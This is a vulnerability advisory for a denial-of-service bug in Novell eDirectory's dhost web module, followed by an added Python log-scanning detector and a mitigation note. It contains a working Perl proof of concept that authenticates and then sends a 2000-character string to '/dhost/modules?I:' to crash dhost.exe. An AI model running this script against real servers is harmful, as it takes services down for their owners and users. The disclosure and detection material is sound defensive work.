Product: Novell eDirectory 8.8 sp5 for Windows
********************************************************************************
Vulnerability: Denial of Service
********************************************************************************
Discussion:
Vulnerability in '/dhost/modules?I:'
Sending long strings to '/dhost/modules?I:' causes a DoS (crashing dhost.exe).
Another bug, in 'modules?L:', was also published in the last weeks; it is not patched yet either.
********************************************************************************
Credits:
HACKATTACK IT SECURITY GmbH
Penetration Testing in Germany - Austria - Switzerland
www.hackattack.com
********************************************************************************
Original Advisory
www.hackattack.com
********************************************************************************
PoC:

#!/usr/bin/perl
# Vulnerability was found by HACKATTACK
use WWW::Mechanize;
use LWP::Debug qw(+);
use HTTP::Cookies;

$address=$ARGV[0];
if(!$ARGV[0]){
    print "Usage:perl $0 address\n";
    exit();
}

$login = "$address/_LOGIN_SERVER_";
$url = "$address/dhost/";
$module = "modules?I:";
$buffer = "A" x 2000;
$vuln = $module.$buffer;

#Edit the username and password.
$user = "username";
$pass = "password";
#Edit the username and password.

my $mechanize = WWW::Mechanize->new();
$mechanize->cookie_jar(HTTP::Cookies->new(file => "$cookie_file",autosave => 1));
$mechanize->timeout($url_timeout);

# Log in through the authenticator form, then request the overlong module string.
$res = $mechanize->request(HTTP::Request->new('GET', "$login"));
$mechanize->submit_form(
    form_name => "authenticator",
    fields => { usr => $user, pwd => $pass},
    button => 'Login');
$response2 = $mechanize->get("$url$vuln");

About HACKATTACK
================
HACKATTACK IT SECURITY GmbH is a penetration testing and security auditing company located in Germany and Austria.
More information about HACKATTACK at http://www.hackattack.com
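
Detection example for the request described under Discussion (added here, not part of the original advisory or of HACKATTACK's code): it scans proxy access-log lines for '/dhost/modules?I:' requests with an overlong argument. Assumptions: a reverse proxy in front of dhost writes Combined Log Format, MAX_ARG_LEN is a site-tuned limit rather than a vendor value, and 'modules?L:' is watched as well only because the advisory names it as a second unpatched bug without describing it.

```python
import re
from urllib.parse import unquote

# Assumptions (not from the advisory): a reverse proxy in front of dhost writes
# Combined Log Format lines, and MAX_ARG_LEN is a site-tuned limit, not a vendor value.
MAX_ARG_LEN = 256
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
SELECTOR_RE = re.compile(r'^(?P<sel>[IL]):(?P<arg>.*)$', re.DOTALL)

def inspect_line(line):
    """Return a finding for an overlong /dhost/modules?I: or ?L: request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    if unquote(path).lower() != "/dhost/modules":
        return None
    hit = SELECTOR_RE.match(unquote(query))  # decode so %41 counts as one character
    if not hit or len(hit.group("arg")) <= MAX_ARG_LEN:
        return None
    arg = hit.group("arg")
    return {
        "src": m.group("src"),
        "time": m.group("ts"),
        "selector": hit.group("sel"),
        "arg_len": len(arg),
        "filler": len(set(arg)) == 1,  # one repeated character, as in the PoC
        "status": m.group("status"),
    }

def scan(lines):
    """Collect findings from an iterable of log lines."""
    return [f for f in map(inspect_line, lines) if f]

# Constructed sample log lines (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /dhost/modules?L:example HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /dhost/modules?I:' + "A" * 2000 + ' HTTP/1.1" 502 0',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /dhost/modules?L:' + "%41" * 300 + ' HTTP/1.1" 502 0',
    '192.0.2.10 - - [01/Jan/2024:10:00:12 +0000] "GET /dhost/ HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same length check can be enforced at the proxy as a request-line or query-length limit for '/dhost/' until a vendor fix is installed.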